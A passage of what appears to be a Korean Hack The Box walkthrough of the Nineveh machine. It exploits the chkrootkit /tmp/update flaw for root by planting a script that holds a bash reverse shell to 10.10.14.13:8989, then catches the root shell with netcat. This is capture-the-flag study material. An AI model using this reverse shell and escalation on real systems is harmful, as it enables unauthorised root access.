Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
루트가 chkrootkit을 통해
/tmp/update 파일을 실행해 주는 취약점.
update 파일을 만들어 주면 된다.
www-data@nineveh:/tmp$ cat update
#!/bin/bash
bash -i >&/dev/tcp/10.10.14.13/8989 0>&1
www-data@nineveh:/tmp$ chmod +x update
www-data@nineveh:/tmp$ ls -l
total 40
-rwxr-xr-x 1 www-data www-data 22264 Apr 19 01:59 45010
-rwxr-xr-x 1 www-data www-data 202 Apr 23 01:01 compare.sh
drwx------ 3 root root 4096 Apr 22 08:50 systemd-private-ad0222835a894206a79bf984a4039dce-systemd-timesyncd.service-ufIUgd
-rwxr-xr-x 1 www-data www-data 53 Apr 23 01:37 update
drwx------ 2 root root 4096 Apr 22 08:50 vmware-root
┌──(root💀takudaddy)-[~]
└─# nc -lvnp 8989 1 ⚙
listening on [any] 8989 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.43] 38378
bash: cannot set terminal process group (21005): Inappropriate ioctl for device
bash: no job control in this shell
root@nineveh:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@nineveh:~#
끝
728x90
'OSCP > HacktheBox' 카테고리의 다른 글
| 14. Node (0) | 2021.04.24 |
|---|---|
| 13. Solid State (0) | 2021.04.24 |
| 11. Brainfuck (0) | 2021.04.22 |
| 10. Sense (0) | 2021.04.22 |
| 9. Cronos (0) | 2021.04.21 |